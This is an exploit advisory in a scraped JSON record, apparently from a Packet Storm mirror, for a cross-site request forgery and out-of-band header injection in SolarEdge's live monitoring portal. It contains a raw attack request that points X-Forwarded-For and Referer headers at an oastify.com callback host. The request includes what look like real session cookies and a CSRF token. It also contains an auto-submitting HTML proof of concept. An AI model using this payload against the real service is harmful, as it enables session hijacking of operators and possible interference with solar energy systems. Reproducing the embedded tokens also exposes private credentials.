{“lastseen”:”2026-04-27T17:14:11″,”description”:”SolarEdge version 3.0-2021 suffers from a cross site request forgery vulnerability in the \/solaredge-web\/p\/initClient that can lead to a remote command injection vulnerability…”,”published”:”2026-04-27T00:00:00″,”modified”:”2026-04-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 SolarEdge 3.0-2021 Cross Site Request Forgery \/ OOB Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:219904″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Titles: solaredge-CSRF-OOB-Injection 3.0-2021 web portal\\n # Author: nu11secur1tyAI\\n # Date: 2026-04-26\\n # Vendor: SolarEdge Technologies Ltd.\\n # Software: SolarEdge Monitoring Platform – Framework \/solaredge-web\/\\n # Reference: https:\/\/monitoring.solaredge.com\/\\n \\n ## Description:\\n The solaredge-CSRF-Hijack vulnerability arises due to a critical business\\n logic flaw in the `\/solaredge-web\/p\/initClient` endpoint. The system allows\\n the generation and overwriting of session parameters (`createCookie`) via\\n POST requests that are not properly validated against their origin.\\n \\n An attacker can exploit this flaw to force a legitimate operator’s browser\\n to execute unauthorized commands without their knowledge. Additionally, an\\n Out-of-Band (OOB) injection vulnerability was discovered via the\\n `X-Forwarded-For` and `Referer` headers. By manipulating these headers, an\\n attacker forces the SolarEdge internal infrastructure to initiate requests\\n to external, attacker-controlled domains (e.g., oastify.com or a custom\\n malicious site). This demonstrates a lack of framework-level filtration,\\n leading to session compromise and potential unauthorized control over\\n physical photovoltaic systems.\\n \\n STATUS: MEDIUM – HIGH\/ Vulnerability\\n \\n [+]Payload:\\n “` POST\\n POST\\n \/solaredge-web\/p\/initClient?cmd=createCookie\\u0026target=login\\u0026client=touch%3Afalse%7Ccsstransforms3d%3Atrue%7Cgeneratedcontent%3Atrue%7Cfontface%3Atrue%7Cflexbox%3Atrue%7Ccanvas%3Atrue%7Ccanvastext%3Atrue%7Cwebgl%3Atrue%7Cgeolocation%3Atrue%7Cpostmessage%3Atrue%7Cwebsqldatabase%3Afalse%7Cindexeddb%3Atrue%7Chashchange%3Atrue%7Chistory%3Atrue%7Cdraganddrop%3Atrue%7Cwebsockets%3Atrue%7Crgba%3Atrue%7Chsla%3Atrue%7Cmultiplebgs%3Atrue%7Cbackgroundsize%3Atrue%7Cborderimage%3Atrue%7Cborderradius%3Atrue%7Cboxshadow%3Atrue%7Ctextshadow%3Atrue%7Copacity%3Atrue%7Ccssanimations%3Atrue%7Ccsscolumns%3Atrue%7Ccssgradients%3Atrue%7Ccssreflections%3Atrue%7Ccsstransforms%3Atrue%7Ccsstransitions%3Atrue%7Cvideo%3A%7Cogg%3Afalse%7Ch264%3Afalse%7Cwebm%3Atrue%7Caudio%3A%7Cogg%3Atrue%7Cmp3%3Atrue%7Cwav%3Atrue%7Cm4a%3Afalse%7Clocalstorage%3Atrue%7Csessionstorage%3Atrue%7Cwebworkers%3Atrue%7Capplicationcache%3Afalse%7Csvg%3Atrue%7Cinlinesvg%3Atrue%7Csmil%3Atrue%7Csvgclippaths%3Atrue%7Cinput%3A%7Cautocomplete%3Atrue%7Cautofocus%3Atrue%7Clist%3Atrue%7Cplaceholder%3Atrue%7Cmax%3Atrue%7Cmin%3Atrue%7Cmultiple%3Atrue%7Cpattern%3Atrue%7Crequired%3Atrue%7Cstep%3Atrue%7Cinputtypes%3A%7Csearch%3Atrue%7Ctel%3Atrue%7Curl%3Atrue%7Cemail%3Atrue%7Cdatetime%3Afalse%7Cdate%3Atrue%7Cmonth%3Atrue%7Cweek%3Atrue%7Ctime%3Atrue%7Cdatetime-local%3Atrue%7Cnumber%3Atrue%7Crange%3Atrue%7Ccolor%3Atrue%7Cfileapi%3Atrue%7Cfullscreen%3Atrue%7CclientWidth%3A800%7CclientHeight%3A600%7CwindowInnerWidth%3A1920%7CwindowInnerHeight%3A1080%7CwindowMaxWidth%3A800%7CwindowMaxHeight%3A600%7Cflash%3Atrue%7Cmobile%3Afalse%7Cphone%3Afalse%7Ctablet%3Afalse%7Cie11%3Afalse%7Ces6%3Atrue\\n HTTP\/2\\n Host: monitoring.solaredge.com\\n Cache-Control: max-age=0\\n Sec-Ch-Ua: \\”Chromium\\”;v=\\”146\\”, \\”Not;A=Brand\\”;v=\\”24\\”, \\”Google Chrome\\”;v=\\”146\\”\\n Sec-Ch-Ua-Mobile: ?0\\n Sec-Ch-Ua-Platform: \\”Windows\\”\\n X-Forwarded-For: cn3iam50ywo00n2a5vvi3o59r0xrln9c.oastify.com\\n Accept-Language: en-US;q=0.9,en;q=0.8\\n User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\\n (KHTML, like Gecko) Chrome\/146.0.0.0 Safari\/537.36\\n Accept: *\/*\\n Sec-Fetch-Site: none\\n Sec-Fetch-Mode: navigate\\n Sec-Fetch-User: ?1\\n Sec-Fetch-Dest: document\\n Accept-Encoding: gzip, deflate, br\\n Cookie:\\n JSESSIONID=6F1B6162792D05EFCE515BF203A1921E9D85FA41057990C6C526B90DAEB5D65BFE52B0034F4F2D5B10424FFE2CBA711A654936F114998927041CA486611931EE3C0F205C04CA429EC894DF7A64DE9DB5108F3140B957001C751D7A57EF756DDD7971301F05C962751C9CA2F4D39478356BDF1D2ABEF343E3B0C8D5D9FF19A8F2;\\n cf_clearance=DtyVi9hHPwvwTxW7i3XtdkHyMQmr.8bxpKOx7YOux2k-1777189382-1.2.1.1-Oe0DEHsLmJqAbUfnWsvheB8svxkc8b6u25VOWn6Q5.47kl..hy7lFUAWAFjjxFt3iVZDZvc.3dByQVMD7OKuyNedVj14sw4mf3ixhjjUzo.u8AbMMvMzr3dTFA.4ZMxREUB6w_km08hdN2Q9dqPdyl6a3Yo2ClDEosIsGuHs5gZkTMybd50CzjFB8UhCMfJDkUND4ZgT7yhn9nuwGnRpOdiW9xeQyMCzd52WXjDuGnrAADkNCbkOM.6VcWypMaA.f2gz2TVRI9gXPqpGBlnxTiwQB25NHZe_oxGVldzLBNdG0M42RlULw5G7DAcF_r1wh.UGpZYS8D4007p9.A_OAQ;\\n __cf_bm=PxF5ZT6Bu4Jvd86dcTD_ayOFIDAo62QeOUj7C0QEn_s-1777189382.1867328-1.0.1.1-8S0957YKxPKpytYZZF4ullyTfKTwS8YpjtVRZlwNMROgEmHBO4fsAHVXdp6MPfQTg3igFXX.Ec4FXoaC5N3gaRAqF8uuepOG1x26_eex8fjMXRd9Mldj1PH43.f.p2Yb;\\n CSRF-TOKEN=38962BC08EC10395F7DE6C11BC3794A98C5AF2B9B56066AC1830F7780E4C8394BA3D0CA2E2D5148E0BB52B778A7C8A11FD90\\n Origin: https:\/\/monitoring.solaredge.com\\n Referer:\\n http:\/\/cn3iam50ywo00n2a5vvi3o59r0xrln9c.oastify.com\/vulnerabilities\/\\n Content-Length: 0\\n \\n “`\\n \\n [+]Exploit:\\n “`html\\n \\u003chtml\\u003e\\n \\u003c!– CSRF PoC –\\u003e\\n \\u003cbody\\u003e\\n \\u003cform action=\\”\\n https:\/\/monitoring.solaredge.com\/solaredge-web\/p\/initClient?cmd=createCookie\\u0026target=login\\u0026client=touch%3Afalse%7Ccsstransforms3d%3Atrue%7Cgeneratedcontent%3Atrue%7Cfontface%3Atrue%7Cflexbox%3Atrue%7Ccanvas%3Atrue%7Ccanvastext%3Atrue%7Cwebgl%3Atrue%7Cgeolocation%3Atrue%7Cpostmessage%3Atrue%7Cwebsqldatabase%3Afalse%7Cindexeddb%3Atrue%7Chashchange%3Atrue%7Chistory%3Atrue%7Cdraganddrop%3Atrue%7Cwebsockets%3Atrue%7Crgba%3Atrue%7Chsla%3Atrue%7Cmultiplebgs%3Atrue%7Cbackgroundsize%3Atrue%7Cborderimage%3Atrue%7Cborderradius%3Atrue%7Cboxshadow%3Atrue%7Ctextshadow%3Atrue%7Copacity%3Atrue%7Ccssanimations%3Atrue%7Ccsscolumns%3Atrue%7Ccssgradients%3Atrue%7Ccssreflections%3Atrue%7Ccsstransforms%3Atrue%7Ccsstransitions%3Atrue%7Cvideo%3A%7Cogg%3Afalse%7Ch264%3Afalse%7Cwebm%3Atrue%7Caudio%3A%7Cogg%3Atrue%7Cmp3%3Atrue%7Cwav%3Atrue%7Cm4a%3Afalse%7Clocalstorage%3Atrue%7Csessionstorage%3Atrue%7Cwebworkers%3Atrue%7Capplicationcache%3Afalse%7Csvg%3Atrue%7Cinlinesvg%3Atrue%7Csmil%3Atrue%7Csvgclippaths%3Atrue%7Cinput%3A%7Cautocomplete%3Atrue%7Cautofocus%3Atrue%7Clist%3Atrue%7Cplaceholder%3Atrue%7Cmax%3Atrue%7Cmin%3Atrue%7Cmultiple%3Atrue%7Cpattern%3Atrue%7Crequired%3Atrue%7Cstep%3Atrue%7Cinputtypes%3A%7Csearch%3Atrue%7Ctel%3Atrue%7Curl%3Atrue%7Cemail%3Atrue%7Cdatetime%3Afalse%7Cdate%3Atrue%7Cmonth%3Atrue%7Cweek%3Atrue%7Ctime%3Atrue%7Cdatetime-local%3Atrue%7Cnumber%3Atrue%7Crange%3Atrue%7Ccolor%3Atrue%7Cfileapi%3Atrue%7Cfullscreen%3Atrue%7CclientWidth%3A800%7CclientHeight%3A600%7CwindowInnerWidth%3A1920%7CwindowInnerHeight%3A1080%7CwindowMaxWidth%3A800%7CwindowMaxHeight%3A600%7Cflash%3Atrue%7Cmobile%3Afalse%7Cphone%3Afalse%7Ctablet%3Afalse%7Cie11%3Afalse%7Ces6%3Atrue\\”\\n method=\\”POST\\”\\u003e\\n \\u003cinput type=\\”submit\\” value=\\”Submit request\\” \/\\u003e\\n \\u003c\/form\\u003e\\n \\u003cscript\\u003e\\n history.pushState(”, ”, ‘\/’);\\n document.forms[0].submit();\\n \\u003c\/script\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n \\n “`\\n \\n # Demo:\\n [href](https:\/\/www.patreon.com\/posts\/solaredge-csrf-156577436)\\n \\n # Time spent:\\n 01:25:00″,”sourceHref”:”https:\/\/packetstorm.news\/download\/219904″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219904\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-27T17:14:11″,”description”:”SolarEdge version 3.0-2021 suffers from a cross site request forgery vulnerability in the \/solaredge-web\/p\/initClient that can lead to a remote command injection vulnerability…”,”published”:”2026-04-27T00:00:00″,”modified”:”2026-04-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 SolarEdge 3.0-2021…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-49745","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n